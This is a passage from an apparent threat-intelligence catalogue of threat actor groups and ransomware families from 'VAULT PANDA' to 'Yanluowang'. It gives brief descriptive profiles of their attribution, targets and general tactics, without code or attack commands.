Samsung TVs, which are turned into covert microphones.

VAULT PANDA

A likely intelligence gathering-focused, China-nexus threat actor group that has targeted organizations in various sectors, especially financial services, around the world.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)]

VaultCrypt

Ransomware

VBRANSOM 7

Ransomware

VCrypt

ransomware

vCrypt1

ransomware

Vect

Vect is an active extortion or ransomware group tracked by RansomLook.

VegaLocker

ransomware

Velso

ransomware

Velvet Ant (Deprecated)

*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "Velvet Ant" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* Velvet Ant is a suspected "China-nexus" espionage group that has notably targeted network devices as part of its operations. In one case involving an unspecified victim located in East Asia, the group was seen abusing a legacy, internet-exposed F5 BIG-IP load balancer appliance as a command-and-control mechanism, managing to maintain network persistence for a period of three years. As part of the broader investigation into the group, researchers also observed cases of zero-day exploitation of CVE-2024-20399 in Cisco Nexus network switch devices, which allowed actors to upload and execute previously unknown, custom malware. The researchers highlighted how sophisticated threat groups are increasingly targeting network appliances as means of network access and persistence, since those appliances "are often not sufficiently protected and monitored".[[Sygnia Velvet Ant June 17 2024](/references/5c313af4-61a8-449d-a6c7-f7ead6c72e19)][[Sygnia Velvet Ant July 1 2024](/references/a0cfeeb6-4617-4dea-80d2-290eaf2bcf5b)]

Velvet Tempest

Velvet Tempest is a threat actor associated with the BlackCat ransomware group. They have been observed deploying multiple ransomware payloads, including BlackCat, and have targeted various industries such as energy, fashion, tobacco, IT, and manufacturing. Velvet Tempest relies on access brokers to gain network access and utilizes tools like Cobalt Strike Beacons and PsExec for lateral movement and payload staging. They exfiltrate stolen data using a tool called StealBit and frequently disable unprotected antivirus products.

Vendetta

ransomware

Venis Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hackers spread the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. In devVenisRansom@protonmail.com

VENOM SPIDER

VENOM SPIDER is the developer of a large toolset that includes SKID, VenomKit and Taurus Loader. Under the moniker 'badbullzvenom', the adversary has been an active member of Russian underground forums since at least 2012, specializing in the identification of vulnerabilities and the subsequent development of tools for exploitation, as well as for gaining and maintaining access to victim machines and carding services. Recent advertisements for the malware indicate that VENOM SPIDER limits the sale and use of its tools, selling modules only to trusted affiliates. This preference can be seen in the fact that adversaries observed using the tools include the targeted criminal adversary COBALT SPIDER and BGH adversaries WIZARD SPIDER and PINCHY SPIDER.

VenomRAT

ransomware

VenusLocker

Ransomware Based on EDA2

VevoLocker

ransomware

Vfokx

Vfokx is an active extortion or ransomware group tracked by RansomLook.

VHD

ransomware

ViACrypt

ransomware

Viagra

ransomware

VICE SPIDER

Vice Spider is a Russian-speaking ransomware group that has been active since at least April 2021 and is linked to a significant increase in identity-based attacks, with a reported 583% rise in Kerberoasting incidents. CrowdStrike attributes 27% of these intrusions specifically to Vice Spider, which exploits vulnerabilities in the Kerberos authentication protocol to crack user passwords.

ViceLeaker

In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims, and a hash of the APK involved (Android application) was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information. During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.

VICEROY TIGER

VICEROY TIGER is an adversary with a nexus to India that has historically targeted entities throughout multiple sectors. Older activity targeted multiple sectors and countries; however, since 2015 this adversary appears to focus on entities in Pakistan with a particular focus on government and security organizations. This adversary consistently leverages spear phishing emails containing malicious Microsoft Office documents, malware designed to target the Android mobile platform, and phishing activity designed to harvest user credentials. In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed a previously unknown APT, whose activity the team can now trace back to at least April 2016. The Chasing Team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization's new attack activity, confirmed and exposed the gang's targeted attacks against Pakistan, and analyzed in detail the unique EHDevel malicious code framework used by the organization.

Vicious Panda

Check Point Research discovered a new campaign against the Mongolian public sector, which takes advantage of the current Coronavirus scare, in order to deliver a previously unknown malware implant to the target. A closer look at this campaign allowed us to tie it to other operations which were carried out by the same anonymous group, dating back to at least 2016. Over the years, these operations targeted different sectors in multiple countries, such as Ukraine, Russia, and Belarus.

ViciousTrap

ViciousTrap has compromised over 5,500 edge devices, transforming them into honeypots and utilizing a shell script called NetGhost to redirect incoming traffic from specific ports to their infrastructure. The actor has targeted various EOL devices, including ASUS routers, Linksys LRT224, and Araknis Networks AN-300-RT-4L2W VPN routers. Observations indicate attempts to deploy a web shell for executing their redirection script, although authorship of the web shell has not been attributed to ViciousTrap. The overall objectives of ViciousTrap remain unclear, but their activities suggest a honeypot-style network aimed at intercepting network flows.

VideoBelle

ransomware

ViiperWare

ransomware

Viking Jackal

Viking Jackal is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

VIKING SPIDER

VIKING SPIDER is the criminal group behind the development and distribution of Ragnar Locker ransomware. While public reporting indicates the group began threatening to leak victim data in February 2020, a DLS was not observed until April 2020. The DLS is hosted on Tor, and similar to other actors, proof of data exfiltration is provided before the stolen data is fully leaked. It was also noted that on Dec. 22, 2020, a new post made to MountLocker ransomware's Tor-hosted DLS was titled 'Cartel News' and included details of a victim of VIKING SPIDER's Ragnar Locker.

VindowsLocker Ransomware

It is aimed at English-speaking users and can therefore infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. The ransom amount is $349.99 and the hacker seems to be from India. He disguises himself as Microsoft Support.

Virlock

Ransomware Polymorphism / Self-replication

Viro

ransomware

ViroBotnet

ransomware

Virus-Encoder

Ransomware

VisionCrypt

ransomware

VMola

ransomware

Void Arachne

Void Arachne is a threat actor group targeting Chinese-speaking users with malicious MSI files containing legitimate software installers for AI software. They exploit public interest in VPN technology and AI software to distribute malware through SEO poisoning and Chinese-language-themed Telegram channels. The group's campaign includes bundling malicious Winos payloads with deepfake pornography-generating AI software and voice-and-face-swapping AI software. Void Arachne also promotes AI technologies for virtual kidnapping and uses AI voice-alternating technology to pressure victims into paying ransom.

Void Balaur

Void Balaur is a highly active hack-for-hire / cyber mercenary group with a wide range of known target types across the globe. Their services have been observed for sale to the public online since at least 2016. Services include the collection of private data and access to specific online email and social media services, such as Gmail, Outlook, Telegram, Yandex, Facebook, Instagram, and business emails.

Void Banshee

Void Banshee is an APT group targeting North America, Europe, and Southeast Asia for information theft and financial gain. They exploit vulnerabilities like CVE-2024-38112 to deliver the Atlantida info-stealer through malicious PDFs disguised as book files. The group uses internet shortcuts with MHTML protocol handlers to access and execute files through disabled Internet Explorer, posing a significant threat to organizations. Void Banshee's TTPs include crafting URL strings to control window sizes in IE and using HTML files to hide malicious downloads from victims.

Void Blizzard

Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to the Russian government, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America. The threat actor uses stolen credentials—which are likely procured from commodity infostealer ecosystems—and collects a high volume of email and files from compromised organizations.

Void Manticore

Void Manticore is an Iranian APT group affiliated with MOIS, known for conducting destructive wiping attacks and influence operations. They collaborate with Scarred Manticore, sharing targets and conducting disruptive operations using custom wipers. Void Manticore's TTPs involve manual file deletion, lateral movement via RDP, and the deployment of custom wipers like the BiBi wiper. The group utilizes online personas like 'Karma' and 'Homeland Justice' to leak information and amplify the impact of their attacks.

Void Rabisu

Void Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted campaigns on Ukraine and countries supporting Ukraine.

VoidCrypt

ransomware

Vojenské spravodajstvo

Military Intelligence - Vojenské spravodajstvo

Vojna sigurnosno-obavještajna agencija

Vojna sigurnosno-obavještajna agencija (VSOA) (Military Security and Intelligence Agency)

Vojnoobaveštajna agencija

Military Intelligence Agency – Војнообавештајна агенција (VOA)

Volga Flood

Microsoft threat actor profile. Origin/Threat: Russia, Influence operations.

Vortex Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hackers spread the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

Vovalex

ransomware

Vsop

aka Onix/Onyx

Vulcan

Vulcan is an active ransomware-as-a-service operation tracked by RansomLook.

Vulston

ransomware

VulzSecTeam

VulzSec, also known as VulzSecTeam, is a hacktivist group that has been involved in various cyber-attacks. They have targeted government websites in retaliation for issues such as police brutality and the treatment of Indian Muslims. The group has been involved in campaigns like OpIndia2.0, where they planned to launch DDoS attacks on Indian government websites.

Vurten

Vurten is an active extortion or ransomware group tracked by RansomLook.

VxLock Ransomware

Developed in Visual Studio in 2010. Its original name is VxCrypt. This ransomware encrypts the victim's files, including photos, music, MS Office, Open Office and PDF documents, etc.

vxLock

Ransomware

w3crypto

w3crypto is an active extortion or ransomware group tracked by RansomLook.

Waffle

ransomware

WageMole

WageMole is a North Korean state-sponsored APT that employs social engineering and technology to secure remote job opportunities in Western countries, leveraging stolen personal data from the Contagious Interview campaign. Threat actors create fake identities, including passports and driver's licenses, and prepare study guides for interviews, often utilizing generative AI for well-structured responses. They target small to mid-sized businesses and utilize job platforms like Upwork and Indeed, while employing automation scripts for account creation. WageMole's activities include sharing code within their group and requesting payments through platforms like PayPal to conceal their identity.

Waissbein

Waissbein is an active extortion or ransomware group tracked by RansomLook.

Waiting

ransomware

Waldo

ransomware

Walocker

Walocker is an active extortion or ransomware group tracked by RansomLook.

Wanna Decryptor Portuguese

ransomware

WannabeHappy

ransomware

WannaCash

ransomware

WannaCry

According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours, with initial reports beginning around 4:00 AM EDT, May 12, 2017. Open-source reporting indicates a requested ransom of 0.1781 bitcoins, roughly $300 U.S.

WannaDie

ransomware

WannaPeace

ransomware

WannaSmile

zCrypt variant discovered on November 17, 2017, one day after the discovery of TYRANT. It used a Farsi-language ransom note asking for a staggering 20 Bitcoin ransom payment. It also advertised local Iran-based payment processors and exchanges (www.exchangeing[.]ir, www.payment24[.]ir, www.farhadexchange.net, and www.digiarz.com) through which Bitcoins could be acquired.

WannaSpam

ransomware

Want Money

ransomware

Warlock

Warlock is an active extortion or ransomware group tracked by RansomLook.

WARP PANDA

WARP PANDA is a China-nexus APT that targets VMware vCenter environments and Microsoft Azure infrastructures, primarily focusing on legal, technology, and manufacturing sectors in the U.S. The group exploits internet-facing edge devices for initial access, later pivoting to vCenter environments using compromised credentials or vulnerabilities. Their toolkit includes the BRICKSTORM backdoor, along with implants like Junction and GuestConduit, which facilitate command execution and network traffic tunneling. WARP PANDA demonstrates advanced OPSEC and aims for long-term persistence and data exfiltration aligned with the interests of the People's Republic of China.

Wassonite

WASSONITE is a North Korea-linked APT that has targeted industrial sectors, including electric generation, nuclear energy, manufacturing, and research entities in India, South Korea, and Japan since at least 2018. The group employs DTrack RAT for remote access, Mimikatz for credential capture, and various system tools for lateral movement and file transfers. WASSONITE has been observed using nuclear energy-themed spear phishing lures to deploy the AppleSeed backdoor, which can take screenshots, log keystrokes, and execute commands from a C2 server. Their operations focus on initial access, reconnaissance, and data collection without demonstrating disruptive capabilities.

WastedLocker

WastedLocker primarily targets corporate networks. Upon initial compromise, often using a fake browser update containing SocGholish, the actor then takes advantage of dual-use and LoLBin tools in an attempt to evade detection. Key observations include lateral movement and privilege escalation. The WastedLocker ransomware has been tied back to EvilCorp.

Watchdog

Thief Libra is a cloud-focused threat group that has a history of cryptojacking operations as well as cloud service platform credential scraping. They were first known to operate on January 27, 2019. They use a variety of custom-built Go scripts as well as repurposed cryptojacking scripts from other groups including TeamTNT. They are currently considered to be an opportunistic threat group that targets exposed cloud instances and applications.

Water Bakunawa

Water Bakunawa is a cybercriminal group identified by Trend Micro, responsible for the RansomHub ransomware, which exploits the Zerologon vulnerability to gain unauthorized network access. The group employs EDRKillShifter to evade detection and disrupt security monitoring processes, utilizing advanced anti-EDR techniques. Their targets include sectors such as water and wastewater, IT, healthcare, and financial services. Members of the group and related affiliates have been linked by association with other high-profile RaaS groups like Scattered Spider and ALPHV.

Water Barghest

Water Barghest is a cybercriminal group that has compromised over 20,000 IoT devices by October 2024, monetizing them through a residential proxy marketplace. They automate the entire process from identifying vulnerable devices using n-day and zero-day exploits to deploying Ngioweb malware and selling the compromised assets. Their operations include leveraging Ubiquiti EdgeRouter devices for espionage and utilizing automated scripts to exploit vulnerabilities within minutes of discovery. Water Barghest has maintained a low profile for years, but their activities gained attention due to the deployment of a zero-day vulnerability against Cisco IOS XE devices in October 2023.

Water Curupira

With its emergence in 2022, Water Curupira has established itself as a persistent threat actor targeting organizations primarily in South America and Europe. Their modus operandi involves a combination of social engineering tactics and a diversified malware arsenal, including ransomware variants like Black Basta and credential stealers like Cobalt Strike. This multifaceted approach enables them to gain unauthorized access to victim systems, steal sensitive data, and ultimately extort victims through ransomware demands. It has been actively using Pikabot, a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.

Water Gamayun

Water Gamayun exploits the MSC EvilTwin zero-day vulnerability to compromise systems and exfiltrate data, utilizing custom payloads and advanced data exfiltration techniques. Their arsenal includes backdoors like SilentPrism and DarkWisp, as well as information stealers such as Stealc and Rhadamanthys. They employ delivery methods like provisioning malicious payloads through signed Microsoft Installer files and leveraging LOLBins to maintain persistence and control over infected systems. Comprehensive analysis of their command-and-control infrastructure reveals sophisticated evasion techniques and dynamic control capabilities.

Water Kurita

Water Kurita is a financially motivated cybercriminal entity associated with the Lumma Stealer infostealer-as-a-service operation, primarily active on underground forums and marketplaces. It focuses on credential and information theft at scale, monetizing access via subscription-based malware distribution and resale of stolen data to other actors. The group demonstrates solid operational security and marketing tactics typical of mature MaaS ecosystems, although a 2025 doxxing campaign exposing alleged core members (personal and financial data) significantly disrupted its activity and drove customers toward competing infostealers.

Water Labbu

Trend Micro discovered a threat actor they named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victims' wallets, unlike other similar campaigns, they did not use any kind of social engineering, at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.

Water Makara

Water Makara employs the Astaroth banking malware, which features a new defense evasion technique. Their spear phishing campaigns exploit human error by targeting users to click on malicious files. To mitigate these threats, organizations should implement regular security training, enforce strong password policies, utilize multifactor authentication (MFA), keep security solutions updated, and apply the principle of least privilege.

Water Orthrus

Water Orthrus is a threat actor known for distributing CopperStealer and CopperPhish malware. They target Microsoft 365 users with phishing campaigns to steal credit card information. The actor has evolved their malware to include rootkits for stealthy installations and has shifted their focus from personal information to cryptocurrency and credit card data. Water Orthrus has been linked to the Scranos campaign reported in 2019.

Water Saci

Water Saci is a sophisticated cyber threat actor operating in Brazil, utilizing a multi-format attack chain that includes HTA files, ZIP archives, and PDFs to bypass security measures. The campaign employs an email-based C&C infrastructure using IMAP connections to terra.com.br accounts, enhancing its resilience and evasion tactics. It leverages social engineering through WhatsApp to propagate malware, specifically the SORVEPOTEL banking trojan, and incorporates advanced techniques for infection and persistence. The modular architecture of the malware allows for dynamic adaptation and extraction of sensitive credentials, indicating a significant evolution in adversarial capabilities.

Water Sigbin

The 8220 Gang, also known as Water Sigbin, is a threat actor group that focuses on deploying cryptocurrency-mining malware. They exploit vulnerabilities in Oracle WebLogic servers, such as CVE-2017-3506 and CVE-2023-21839, to deliver cryptocurrency miners using PowerShell scripts. The group has demonstrated a sophisticated multistage loading technique to deploy the PureCrypter loader and XMRIG crypto miner. They are known for using obfuscation techniques, such as hexadecimal encoding and code obfuscation, to evade detection and compromise systems.

Wcry Ransomware

It is aimed at English-speaking users and can therefore infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc.

Weaxor

Weaxor is an active extortion or ransomware group tracked by RansomLook.

Webworm

Space Pirates is a cybercrime group that has been active since at least 2017. They primarily target Russian companies and have been observed using various malware, including Deed RAT and ShadowPad. The group uses a combination of publicly available tools and their own protocols to communicate with their command-and-control servers.

WeChat Ransom

Over 100,000 computers in China have been infected in just a few days with poorly-written ransomware that encrypts local files and steals credentials for multiple Chinese online services. The crooks show a screen titled UNNAMED1989 and demand from the victim a ransom of 110 yuan ($16) in exchange for decrypting the files, payable via Tencent's WeChat payment service by scanning a QR code.

WeedSec

WeedSec is a threat actor group that recently targeted the online learning and course management platform Moodle, which is widely used by educational institutions and workplaces. They posted sample Moodle databases on their Telegram channel.

WeRedEvils

WeRedEvils is a hacking group that has claimed responsibility for multiple cyber attacks. They targeted the Iranian Electric Grid and the Tasnimnews website, causing the latter to go offline. The group also claimed to have hacked into Iran's oil infrastructure, causing significant damage. They emerged in response to the Hamas massacre and are believed to be a group of Israeli cyber experts.

Werewolves

Werewolves is an active extortion or ransomware group tracked by RansomLook.

Wesker

ransomware

WET PANDA

WET PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

weyhro

Appears to be a Data Extortion group with no encryption.

WhatAFuck

ransomware

Wheat Tempest

Microsoft threat actor profile. Origin/Threat: Financially motivated.

WhisperGate

Destructive malware deployed against targets in Ukraine in January 2022.

White Bear

As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. Much of the contents of that report are reproduced here. WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report “Skipper Turla – the White Atlas framework” from mid-2016. Like previous Turla activity, WhiteBear leverages compromised websites and hijacked satellite connections for command and control (C2) infrastructure. As a matter of fact, WhiteBear infrastructure has overlap with other Turla campaigns, like those deploying Kopiluwak, as documented in “KopiLuwak – A New JavaScript Payload from Turla” in December 2016. WhiteBear infected systems maintained a dropper (which was typically signed) as well as a complex malicious platform which was always preceded by WhiteAtlas module deployment attempts. However, despite the similarities to previous Turla campaigns, we believe that WhiteBear is a distinct project with a separate focus. We note that this observation of delineated target focus, tooling, and project context is an interesting one that also can be repeated across broadly labeled Turla and Sofacy activity. From February to September 2016, WhiteBear activity was narrowly focused on embassies and consular operations around the world. All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations. Continued WhiteBear activity later shifted to include defense-related organizations into June 2017. When compared to WhiteAtlas infections, WhiteBear deployments are relatively rare and represent a departure from the broader Skipper Turla target set. Additionally, a comparison of the WhiteAtlas framework to WhiteBear components indicates that the malware is the product of separate development efforts. 
WhiteBear infections appear to be preceded by a condensed spearphishing dropper, lack Firefox extension installer payloads, and contain several new components signed with a new code signing digital certificate, unlike WhiteAtlas incidents and modules.

White Lock

White Lock is an active extortion or ransomware group tracked by RansomLook.

WhiteCobra

WhiteCobra is a threat actor that has infiltrated the Visual Studio Code marketplace and Open VSX registry, deploying 24 malicious extensions targeting cryptocurrency development tools, particularly Solidity. The group employs social engineering tactics, manipulates download counts and reviews, and uses fake branding to establish credibility for their extensions, which deliver LummaStealer on Windows and unknown malware on macOS. WhiteCobra has been linked to a $500,000 cryptocurrency theft in July 2025 and maintains detailed playbooks with revenue targets, showcasing their organized and persistent operations. Despite ongoing efforts by security researchers to remove their malicious extensions, WhiteCobra continues to upload new threats weekly, highlighting the sophistication of their TTPs.

WhiteRose

A new ransomware has been discovered by MalwareHunterTeam that is based on the InfiniteTear ransomware family, of which BlackRuby and Zenis are members. When this ransomware infects a computer, it encrypts the files, scrambles the filenames, and appends the .WHITEROSE extension to them.

WhoLocker

ransomware

WhyCry

ransomware

WickedLocker HT Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

Wiki Ransomware

Wiki Ransomware is an active extortion or ransomware group tracked by RansomLook.

wikileaksv2

Group is connected to Qilin.

WildCard

Wildcard is a threat actor that initially targeted Israel's educational sector with the SysJoker malware. They have since expanded their operations and developed additional malware variants, disguised as legitimate software, including one written in the Rust programming language called RustDown. Their precise identity remains unknown, but they have shown advanced capabilities and a focus on critical sectors within Israel.

WildFire Locker

Ransomware Zyklon variant

WildNeutron

A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not state-sponsored but rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies that have publicly acknowledged attacks. Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target. This group operates at a much higher level than the average cybercrime gang. It is not interested in stealing credit card details or customer databases and is instead focused on high-level corporate information. Butterfly may be selling this information to the highest bidder or may be operating as hackers for hire. Stolen information could also be used for insider-trading purposes.

WildPressure

WildPressure is a threat actor that targets industrial-related entities in the Middle East. They use a variety of programming languages, including C++, VBScript, and Python, to develop their malware. They have been observed using virtual private servers and compromised servers, particularly WordPress websites, in their infrastructure. While there are some minor similarities with other threat actors in the region, there is not enough evidence to make any attribution.

Windows_Security Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

Windows10

ransomware

WininiCrypt

ransomware

Winnix Cryptor Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

WinRarer Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

Winsecure

ransomware

WinUpdatesDisabler

ransomware

WinWord64

ransomware

WIP19

WIP19 is a Chinese-speaking threat group involved in espionage targeting the Middle East and Asia. They utilize a stolen certificate to sign their malware, including SQLMaggie, ScreenCap, and a credential dumper. The group has been observed targeting telecommunications and IT service providers, using toolsets authored by WinEggDrop. WIP19's activities suggest they are after specific information and are part of the broader Chinese espionage landscape.

Wiper Leak

Wiper Leak is an active extortion or ransomware group tracked by RansomLook.

Wisteria Tsunami

Microsoft threat actor profile. Origin/Threat: India, Private sector offensive actor.

Witchetty

Witchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of TA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity was characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage payload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions, charities, and industrial/manufacturing organizations.

WIZARD SPIDER

Wizard Spider is reportedly associated with Grim Spider and Lunar Spider. The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware. This group represents a growing criminal enterprise of which GRIM SPIDER appears to be a subset. The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot (aka IcedID), which was first observed in April 2017. The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud, through the use of webinjects and a malware distribution function. GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.

WOLF SPIDER

FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.

WoodRat

ransomware

World Leaks

History and Origins
Origins: Formerly known as "Hunters International," active since late 2023, and believed to be a reincarnation of the Hive group.
Rebranding: In January 2025, Hunters International ceased file-encrypting attacks and reemerged under the WorldLeaks banner, focusing solely on data theft and extortion.
Tactics, Techniques, and Objectives
Model: Operates as an "extortion-as-a-service" (EaaS) platform. Affiliates are provided with tools to automatically extract data.
Exfiltration & Publication: Theft of sensitive data followed by a threat of publication on a Tor site if the victim refuses to pay.
No encryption: The group abandons file encryption to focus on theft, reducing complexity and risk.

Worok

Worok is a cyber espionage group, mostly targeting Central Asia. The group toolset includes a C++ loader named CLRLoad, a PowerShell backdoor named PowHeartBeat, and a C# loader named PNGLoad.

WTDI

ransomware

WyvernLocker

ransomware

X-Files

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc.

X Locker 5.0

ransomware

X3M Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc. Intrusion is also possible over Windows RDP with the help of pass-the-hash, PuTTY, mRemoteNG, TightVNC, Chrome Remote Desktop, a modified version of TeamViewer, AnyDesk, AmmyyAdmin, LiteManager, Radmin and others. The ransom is $700 in Bitcoin.

XakNet

XakNet is a self-proclaimed hacktivist group that has targeted Ukraine. They claim to be comprised of Russian patriotic volunteers and have conducted various threat activities, including DDoS attacks, compromises, data leaks, and website defacements. They coordinate their operations with other hacktivist groups and have connections to APT28, a cyber espionage group sponsored by the GRU.

Xcatze

Cloud security company Lacework says it discovered a threat actor group named Xcatze that uses a Python malware named AndroxGh0st to take over AWS servers and send out massive email spam campaigns. Lacework says the malware operates by scanning web apps written in the Laravel PHP framework for exposed configuration files to identify and steal server credentials. Researchers said AndroxGh0st specifically searches for AWS, SendGrid, and Twilio credentials, which it uses to take control of email servers and accounts and send out the spam campaigns.

XCry

ransomware

XCrypt Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc. Written in Delphi. The attacker asks the victim to get in touch through ICQ to pay the ransom and recover the files.

XD Locker

ransomware

XD

ransomware

XData

ransomware

XDSpy

Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that; a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group has compromised many government agencies and private companies in Eastern Europe and the Balkans.

Xelera

Xelera is an active extortion or ransomware group tracked by RansomLook.

XeroWare

ransomware

Xiaoqiying

Xiaoqiying is a primarily Chinese-speaking threat group that is best known for conducting website defacement and data exfiltration attacks on more than a dozen South Korean research and academic institutions in late January 2023. Research from Recorded Future's Insikt Group has found that the group's affiliated threat actors have signaled a new round of cyberattacks against organizations in Japan and Taiwan. Although it shows no clear ties to the Chinese government, Xiaoqiying is staunchly pro-China and vows to target NATO countries as well as any country or region that is deemed hostile to China.

Xinglocker

Xing uses a custom MountLocker executable.

Xinof

Xinof is an active extortion or ransomware group tracked by RansomLook.

XinXin

XinXin is a Chinese-speaking threat actor known for its phishing-as-a-service platform, Lucid, which targets global organizations to steal credit card details and personally identifiable information through smishing campaigns. The group employs advanced techniques such as exploiting Rich Communication Services and Apple's iMessage protocol to bypass traditional SMS filters. XinXin also develops and utilizes other phishing kits like Lighthouse and Darcula, facilitating large-scale phishing operations with automated tools and evasion techniques. The group operates a structured hierarchy and monetizes stolen data while actively supporting the development of similar PhaaS services.

Xleaks

Xleaks is an active extortion or ransomware group tracked by RansomLook.

Xlockr

ransomware

XmdXtazX

ransomware

XMRLocker

ransomware

Xncrypt

ransomware

Xollam

Xollam is an active extortion or ransomware group tracked by RansomLook.

Xolzsec

Ransomware written by self-proclaimed script kiddies; it should really be considered trollware.

Xorist

Ransomware. Encrypted files still retain the original, unencrypted header of 0x33 bytes.

xp95

xp95 is an active extortion or ransomware group tracked by RansomLook.

XRat

ransomware

XRTN

Ransomware VaultCrypt family

XTPLocker 5.0 Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

xXLecXx

ransomware

XyuEncrypt

ransomware

XYZWare Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. Based on HiddenTear.

Yanbian Gang

RiskIQ characterizes the Yanbian Gang as a group that targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, Shinhan Finance, KB Kookmin Bank, and NH Savings Bank.

Yanluowang

